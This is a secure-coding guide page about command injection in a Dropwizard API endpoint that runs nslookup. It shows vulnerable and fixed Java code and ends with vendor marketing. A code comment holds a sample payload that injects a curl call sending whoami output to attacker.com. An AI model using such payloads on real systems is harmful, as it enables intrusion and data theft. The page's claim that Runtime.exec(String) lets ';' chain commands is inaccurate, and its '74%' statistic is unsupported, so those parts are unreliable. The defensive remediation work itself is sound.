GuardAPI Logo
GuardAPI

Fix Command Injection in Dropwizard

Command injection in Dropwizard environments typically surfaces within JAX-RS Resources when unsanitized user input is piped directly into system shells. If you are using Runtime.getRuntime().exec() with string concatenation, you are handing over Remote Code Execution (RCE) to any attacker who can reach your API. This is a critical failure in input handling and process invocation.

The Vulnerable Pattern

@Path("/v1/system")
public class DiagnosticResource {
    @GET
    @Path("/lookup")
    public String dnsLookup(@QueryParam("domain") String domain) throws IOException {
        // CRITICAL VULNERABILITY: String concatenation allows shell metacharacters
        // Example payload: "; curl http://attacker.com/$(whoami)"
        Process p = Runtime.getRuntime().exec("nslookup " + domain);
        return IOUtils.toString(p.getInputStream(), StandardCharsets.UTF_8);
    }
}

The Secure Implementation

The vulnerability exists because Runtime.exec(String) treats the entire input as a single command line to be parsed by a shell-like tokenizer, allowing characters like ';', '&', and '|' to execute arbitrary commands. To remediate, first apply a strict regex whitelist to the input. Second, migrate to ProcessBuilder, passing the command and its arguments as a List. This ensures the operating system treats the 'domain' variable as a literal argument to the 'nslookup' binary, rather than part of the executable command string, effectively neutralizing injection attempts.

@Path("/v1/system")
public class DiagnosticResource {
    @GET
    @Path("/lookup")
    public String dnsLookup(@QueryParam("domain") String domain) throws IOException {
        // 1. Strict Input Validation (Allow-list approach)
        if (domain == null || !domain.matches("^[a-zA-Z0-9.-]+$")) {
            throw new WebApplicationException("Invalid domain format", 400);
        }

    // 2. Use ProcessBuilder with argument arrays to prevent shell interpolation
    ProcessBuilder pb = new ProcessBuilder("nslookup", domain);
    Process p = pb.start();
    
    return IOUtils.toString(p.getInputStream(), StandardCharsets.UTF_8);
}


}

System Alert • ID: 2601
Target: Dropwizard API
Potential Vulnerability

Your Dropwizard API might be exposed to Command Injection

74% of Dropwizard apps fail this check. Hackers use automated scanners to find this specific flaw. Check your codebase before they do.

RUN FREE SECURITY DIAGNOSTIC
GuardLabs Engine: ONLINE

Free Tier • No Credit Card • Instant Report

Verified by Ghost Labs Security Team

This content is continuously validated by our automated security engine and reviewed by our research team. Ghost Labs analyzes over 500+ vulnerability patterns across 40+ frameworks to provide up-to-date remediation strategies.

About GuardLabs → Follow us on X